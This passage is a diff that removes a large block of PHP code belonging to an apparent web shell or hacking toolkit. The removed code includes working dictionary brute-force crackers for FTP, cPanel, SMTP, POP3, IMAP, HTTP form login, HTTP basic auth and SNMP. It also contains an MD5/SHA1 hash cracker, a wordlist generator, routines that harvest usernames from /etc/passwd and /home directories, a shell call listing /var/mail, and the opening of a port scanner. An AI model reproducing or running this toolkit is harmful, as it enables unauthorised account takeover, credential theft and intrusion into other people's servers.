-  and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";

- }

- curl_close($ch);

-}

-

-$time_start = getmicrotime();

-

-if(isset($submit) && !empty($submit))

-{

- if(empty($users) && empty($pass) )

- {

-   print "<p><font face=\"Comic Sans MS\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }

- if(empty($users)){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }

- if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };

- $userlist=explode("\n",$users);

- $passlist=explode("\n",$pass);

- print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">

- LETS GAME BEGIN ;) ...</font></b><br><br>";

-

- if(isset($_POST['connect_timeout']))

- {

-  $connect_timeout=$_POST['connect_timeout'];

- }

-

- if($cracktype == "ftp")

- {

-  foreach ($userlist as $user) 

-  {

-   $pureuser = trim($user);

-   foreach ($passlist as $password ) 

-   {

-     $purepass = trim($password);

-     ftp_check($target,$pureuser,$purepass,$connect_timeout);

-   }

-  }

- }

- 

- if ($cracktype == "cpanel" || $cracktype == "cpanel2")

- {

-  if($cracktype == "cpanel2")

-  {

-   $cpanel_port="23";

-  }

-  else

-   $cpanel_port="2082";

-  

-  foreach ($userlist as $user) 

-  {

-   $pureuser = trim($user);

-   print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\"  style=\"font-size: 9pt\" color=\"#FF0800\">

-   Please put some good password to crack user $pureuser    :(  ... </font></b>";

-   if($_POST['bruteforce']=="true")

-   {

-    echo " bruteforcing ..";

-        echo "<br>";

-        brute();

-   }

-   else

-   {

-         echo "<br>"; 

-         foreach ($passlist as $password ) 

-     {

-       $purepass = trim($password);

-       cpanel_check($target,$pureuser,$purepass,$connect_timeout);

-     }

-   }

-  }

-  $time_end = getmicrotime();

-$time = $time_end - $time_start; 

- print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">

- Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";

-  }

-}

-

-

-

-?>

-

-    <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#006A00" >

-          <tr>

-           <td>

-             <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="20" name="S1" cols="173">

-         <?php

-   if (isset($_GET['user']))

-      system('ls /var/mail'); 

-   if (isset($_POST['grab_users1'])) //grab users from /etc/passwd

-   {

-          $lines=file("/etc/passwd");

-          foreach($lines as $nr=>$val)

-          {

-           $str=explode(":",$val);

-           echo $str[0]."\n";

-          }

-         

-   }

-   if (isset($_POST['grab_users2']))

-    {

-     $dir = "/home/";

-     if ($dh = opendir($dir)) {

-        while (($file = readdir($dh)) !== false) {

-            echo $file. "\n";

-        }

-                        closedir($dh);

-                }

-        }

-?>

-        </textarea>

-           </td>

-          </tr>

-          <tr>

-          <td valign="top"><p align="center">

-            <table>

-         <tr >

-                 <td>

-          <form action="" method="POST">

-                     <input type="hidden" value="true" name="grab_users1"></input>

-             <input type=submit value="Grab Usernames from /etc/passwd" width="217px"></input>

-                  </form>

-                  </td>

-                 

-                 <td>

-           <form action="" method="POST">

-             <input type="hidden" value="true" name="grab_users2" ></input>

-             <input style="width: 217px;" type=submit value="Grab Usernames from /home/" ></input>

-           </form>

-                   </td>

-        <td>

-           <form action="" method="POST">

-              <input type="hidden" value="true" name="grab_users3"></input>

-              <input style="width: 217px;" type=submit value="Grab Usernames from /home/ II"></input>

-           </form>

-                 </td>

-         </tr>

-        </table></p>

-                </td>

-          </tr>

-        </table>

-        <?php

-if (isset($_POST['grab_users3']))

-{

-error_reporting(0);

-$dir = "/home/";

-if ($dh = opendir($dir))

-{

-$f = readdir($dh);$f = readdir($dh);

-while (($f = readdir($dh)) !== false)

-{

-//echo $f. "\n";

-$f.="/";

-$dh2=opendir($dir.$f);

-$f2 = readdir($dh2);$f2 = readdir($dh2);

-while (($f2 = readdir($dh2)) !== false)

-{

-//echo $f2. "\n";

-$f2.="/";

-$dh3=opendir($dir.$f.$f2);

-$f3 = readdir($dh3);$f3 = readdir($dh3);

-while (($f3 = readdir($dh3)) !== false)

-{

-echo $f3. "<br>";

-}

-}

-

-}

-closedir($dh);

-}

-}

-?>

- 

- 

-</div> 

-

-<?php

-}

-

-if ($act == "hash")

-{

-global $errorbox,$t,$et,$hcwd;

-if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-if ($dictionary){

-$hash=strtoupper($_REQUEST['hash']);

-echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();

-$type=($_REQUEST['type']=='MD5')?'md5':'sha1';

-while(!feof($dictionary)){

-$word=trim(fgets($dictionary)," \n\r");

-if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}

-}

-echo "Done!</font>";

-fclose($dictionary);

-}

-else{

-echo "$errorbox Can not open dictionary.$et";

-}

-}

-echo "<center><table width=\"30%\">Hash cracker:</td><td ></td></tr><form method=\"POST\"><tr><td width=\"30%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" ><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></table></center>";

-echo $eval_php_code;

-}

-

-if ($act == "smtp")

-{

-global $t,$et,$errorbox,$crack;

-if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){

-$target=$_REQUEST['target'];

-$type=$_REQUEST['combo'];

-$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-if ($dictionary){

-echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br/>";flusheR();

-while(!feof($dictionary)){

-if($type){

-$combo=trim(fgets($dictionary)," \n\r");

-$user=substr($combo,0,strpos($combo,':'));

-$pass=substr($combo,strpos($combo,':')+1);

-}else{

-$pass=trim(fgets($dictionary)," \n\r");

-}

-$smtp=smtplogiN($target,$user,$pass,5);

-if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{

-if ($smtp){echo "U: $user P: $pass<br/>";if(!$type)break;}}

-flusheR();

-}

-echo "<br>Done</font>";

-fclose($dictionary);

-}

-else{

-echo "$errorbox Can not open dictionary.$et";

-}

-}else 

-{

-echo "<center>SMTP cracker:$crack";

-}

-

-echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">SMTP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";

-

-

-}

-

-if ($act == "pop3")

-{

-

-global $t,$et,$errorbox,$crack;

-if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){

-$target=$_REQUEST['target'];

-$type=$_REQUEST['combo'];

-$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-if ($dictionary){

-echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();

-while(!feof($dictionary)){

-if($type){

-$combo=trim(fgets($dictionary)," \n\r");

-$user=substr($combo,0,strpos($combo,':'));

-$pass=substr($combo,strpos($combo,':')+1);

-}else{

-$pass=trim(fgets($dictionary)," \n\r");

-}

-$pop3=pop3logiN($target,$user,$pass);

-if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{

-if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}

-flusheR();

-}

-echo "<br>Done</font>";

-fclose($dictionary);

-}

-else{

-echo "$errorbox Can not open dictionary.$et";

-}

-}else 

-{ echo "<center>POP3 cracker:$crack</center>";

-}

-echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">POP3 cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";

-

-}

-if ($act == "ftp")

-{

-global $errorbox,$t,$et,$crack;

-if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";

-else{

-if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){

-$target=$_REQUEST['target'];

-$type=$_REQUEST['combo'];

-$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-if ($dictionary){

-echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";

-while(!feof($dictionary)){

-if($type){

-$combo=trim(fgets($dictionary)," \n\r");

-$user=substr($combo,0,strpos($combo,':'));

-$pass=substr($combo,strpos($combo,':')+1);

-}else{

-$pass=trim(fgets($dictionary)," \n\r");

-}

-if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}

-if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}

-ftp_close($ftp);

-flusheR();

-}

-echo "<br>Done</font>";

-fclose($dictionary);

-}

-else{

-echo "$errorbox Can not open dictionary.$et";

-}

-}

-else 

-{

-echo "<center>FTP cracker:$crack</center>";

-}

-echo "<center><table border=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tbody><form method=\"POST\" name=\"form\" action=\"\"><tr><td width=\"40%\" bgcolor=\"#333333\">FTP cracker:</td><td bgcolor=\"#333333\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=\"text\" name=\"dictionary\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=\"radio\" name=\"combo\" checked=\"\" value=\"0\" onclick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=\"radio\" value=\"1\" name=\"combo\" onclick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=\"text\" size=\"35\" value=\"root\" name=\"user\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=\"text\" name=\"target\" value=\"localhost\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input class=\"buttons\" type=\"submit\" value=\"Start\"></td></tr></form></tbody></table></center>";

-

-}

-}

-

-if ($act == "imap")

-{

-global $t,$et,$errorbox,$crack;

-if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){

-$target=$_REQUEST['target'];

-$type=$_REQUEST['combo'];

-$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-if ($dictionary){

-echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();

-while(!feof($dictionary)){

-if($type){

-$combo=trim(fgets($dictionary)," \n\r");

-$user=substr($combo,0,strpos($combo,':'));

-$pass=substr($combo,strpos($combo,':')+1);

-}else{

-$pass=trim(fgets($dictionary)," \n\r");

-}

-$imap=imaplogiN($target,$user,$pass);

-if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{

-if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}

-flusheR();

-}

-echo "<br/>Done</font>";

-fclose($dictionary);

-}

-else{

-echo "$errorbox Can not open dictionary.$et";

-}

-}else 

-{

-echo "<center>IMAP cracker:$crack</center>";

-}

-print ('<center><table border="0" style="border-collapse: collapse" bordercolor= "#282828" width="40%"><tbody><form method="POST" name="form" action=""><tr><td width="40%" bgcolor="#333333">IMAP cracker:</td><td bgcolor="#333333"></td></tr><tr><td width="20%" bgcolor="#666666">Dictionary:</td><td bgcolor="#666666"><input type="text" name="dictionary" size="35" \></td></tr><tr><td width="20%" bgcolor="#808080" \>Dictionary type:</td><td bgcolor="#808080"><input type="radio" name="combo" checked="" value="0" onclick="document.form.user.disabled = false;" style="border-width:1px;background-color:#808080;" \>Simple (P)<input type="radio" value="1" name="combo" onclick="document.form.user.disabled = true;" style="border-width:1px;background-color:#808080;">Combo (U:P)</td></tr><tr><td width="20%" bgcolor="#666666" \>Username:</td><td bgcolor="#666666"><input type="text" size="35" value="root" name="use" \></td></tr><tr><td width="20%" bgcolor="#808080">Server:</td><td bgcolor="#808080"><input type="text" name="target" value="localhost" size="35" \></td></tr><tr><td width="20%" bgcolor="#666666"></td><td bgcolor="#666666" align="right"><input type="submit" value="Start" \></td></tr></form></tbody></table></center>');

-

-}

-

-if ($act == "dic")

-{

-global $errorbox,$windows,$footer,$t,$et,$hcwd;

-if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;

-if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){

-$min = $_REQUEST['min'];

-$max = $_REQUEST['max'];

-if($max<$min)die($errorbox ."Bad input!$et". $footer);

-$s =$w="";

-$out = $_REQUEST['output'];

-$r = ($_REQUEST['range']=='a' )?'a':'A';

-if ($_REQUEST['range']==0) $r=0;

-for($i=0;$i<$min;$i++) $s.=$r;

-$dic = fopen($out,'a');

-if(is_nan($r)){

-while(strlen($s)<=$max){

-$w = $s;

-if($combo)$w="$w:$w";

-fwrite($dic,$w."\n");

-$s++;}

-}

-else{

-while(strlen($w)<=$max){

-$w =(string)str_repeat("0",($min - strlen($s))).$s;

-if($combo)$w="$w:$w";

-fwrite($dic,$w."\n");

-$s++;}

-}

-fclose($dic);

-echo "<font color=yellow>Done</font>";

-}

-if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){

-$input=fopen($_REQUEST['input'],'r');

-if (!$input){

-if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";

-else{

-$input=explode("\n",shelL("cat $input"));

-$output=fopen($_REQUEST['output'],'w');

-if ($output){

-foreach ($input as $in){

-$user = $in;

-$user = trim(fgets($in)," \n\r");

-if (!strstr($user,":"))continue;

-$user=substr($user,0,(strpos($user,':')));

-if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");

-}

-fclose($input);fclose($output);

-echo "<font color=yellow>Done</font>";

-}

-}

-}

-else{

-$output=fopen($_REQUEST['output'],'w');

-if ($output){

-while (!feof($input)){

-$user = trim(fgets($input)," \n\r");

-if (!strstr($user,":"))continue;

-$user=substr($user,0,(strpos($user,':')));

-if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");

-}

-fclose($input);fclose($output);

-echo "<font color=yellow>Done</font>";

-}

-else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";

-}

-}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){

-$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);

-if($combo && $res){

-$file=file($_REQUEST['output']);

-$output=fopen($_REQUEST['output'],'w');

-foreach ($file as $v)fwrite($output,"$v:$v\n");

-fclose($output);

-}

-echo "<font color=yellow>Done</font>";

-}else{

-$temp=whereistmP();

-echo "<center>

-<table>

-<tr valign=top><td>

-<table>Wordlist generator:<form method=\"POST\">

-<tr>

-<td width=\"20%\" bgcolor=\"#666666\">Range:</td>

-<td bgcolor=\"#666666\">

-<select name=range>

-<option value=a>a-z</option>

-<option value=Z>A-Z</option>

-<option value=0>0-9</option></select>

-</td></tr>

-<tr>

-<td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td>

-<td bgcolor=\"#808080\">

-<select name=min>

-<option value=1>1</option>

-<option value=2>2</option>

-<option value=3>3</option>

-<option value=4>4</option>

-<option value=5>5</option>

-<option value=6>6</option>

-<option value=7>7</option>

-<option value=8>8</option>

-<option value=9>9</option>

-<option value=10>10</option>

-</select>

-</td></tr>

-<tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td>

-<td bgcolor=\"#666666\">

-<select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select>

-</td></tr>

-<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>

-<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr>

-<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table>

-</td><td>

-<table>Grab dictionary:

-<form method=\"POST\">

-<tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td>

-<td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr>

-<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td>

-<td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>

-<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>

-<tr>

-<td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form>

-</table>

-</td><td>

-<table>Download dictionary:<form method=\"POST\">

-<tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr>

-<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>

-<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>

-<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table>

-</td>

-</tr></table>

-</center>             ";}

-}

-

-if ($act == "htmlform")

-{

-global $errorbox,$footer,$et,$hcwd;

-if(!empty($_REQUEST['start'])){

-$url=$_REQUEST['target'];

-$uf=$_REQUEST['userf'];

-$pf=$_REQUEST['passf'];

-$sf=$_REQUEST['submitf'];

-$sv=$_REQUEST['submitv'];

-$method=$_REQUEST['method'];

-$fail=$_REQUEST['fail'];

-$dic=$_REQUEST['dictionary'];

-$type=$_REQUEST['combo'];

-$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";

-if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");

-$dictionary=fopen($dic,'r');

-echo "<font color=blue>Cracking started...<br>";

-while(!feof($dictionary)){

-if($type){

-$combo=trim(fgets($dictionary)," \n\r");

-$user=substr($combo,0,strpos($combo,':'));

-$pass=substr($combo,strpos($combo,':')+1);

-}else{

-$pass=trim(fgets($dictionary)," \n\r");

-}

-$url.="?$uf=$user&$pf=$pass&$sf=$sv";

-$res=check_urL($url,$method,$fail,12);

-if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}

-flusheR();

-}

-fclose($dictionary);

-echo "Done!</font><br>";

-}

-else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";

-}

-

-if ($act == "basicauth")

-{

-global $errorbox,$et,$t,$crack,$hcwd;

-if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){

-$data='';

-$method=($_REQUEST['method'])?'POST':'GET';

-if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}

-spliturL($_REQUEST['target'],$host,$page);

-$type=$_REQUEST['combo'];

-$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";

-if($method='GET')$page.=$data;

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-echo "<font color=blue>";

-while(!feof($dictionary)){

-if($type){

-$combo=trim(fgets($dictionary)," \n\r");

-$user=substr($combo,0,strpos($combo,':'));

-$pass=substr($combo,strpos($combo,':')+1);

-}else{

-$pass=trim(fgets($dictionary)," \n\r");

-}

-$so=fsockopen($host,80,$en,$es,5);

-if(!$so){echo "$errorbox Can not connect to host$et";break;}

-else{

-$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");

-if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);

-$packet.="\r\n\r\n";

-$packet.=$data;

-fputs($so,$packet);

-$res=substr(fgets($so),9,2);

-fclose($so);

-if($res=='20')echo "U: $user P: $pass</br>";

-flusheR();

-}

-}

-echo "Done!</font>";

-}else echo "<center><form method=\"POST\" name=form><table><tr><td bgcolor=\"#333333\"><font color=silver>

-HTTP Auth cracker:</font></td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";

-}

-

-if ($act == "snmp")

-{

-global $t,$et,$errorbox,$crack,$hcwd;

-if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){

-$target=$_REQUEST['target'];

-$dictionary=fopen($_REQUEST['dictionary'],'r');

-if ($dictionary){

-echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();

-while(!feof($dictionary)){

-$com=trim(fgets($dictionary)," \n\r");

-$res=snmpchecK($target,$com,2);

-if($res)echo "$com<br>";

-flusheR();

-}

-echo "<br>Done</font>";

-fclose($dictionary);

-}

-else{

-echo "$errorbox Can not open dictionary.$et";

-}

-}

- echo "<center><table width=\"50%\">SNMP cracker:<form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";

-}

-

-

-

-if ($act == "scanner")

-{

-global $hcwd;

-if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";

-$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;

-if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){

-$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;

-echo "<font color=yellow>Port scanning started against ".htmlspecialchars($target).":<br>";

-$start=time();

-for($i=$from;$i<=$to;$i++){

-if($tcp){

-if (checkthisporT($target,$i,$timeout)){

-$nu++;

-$ser="";

-if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";

-echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";

-}

-}

-if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}

-flusheR();

-}

-$time=time()-$start;

-echo "Done! ($time seconds)</font>";

-}

-elseif (!empty($_REQUEST['securityscanner'])){

-echo "<font color=yellow>";

-$start=time();

-$from=$_REQUEST['from'];

-$to=(int)$_REQUEST['to'];

-$timeout=(int)$_REQUEST['timeout'];

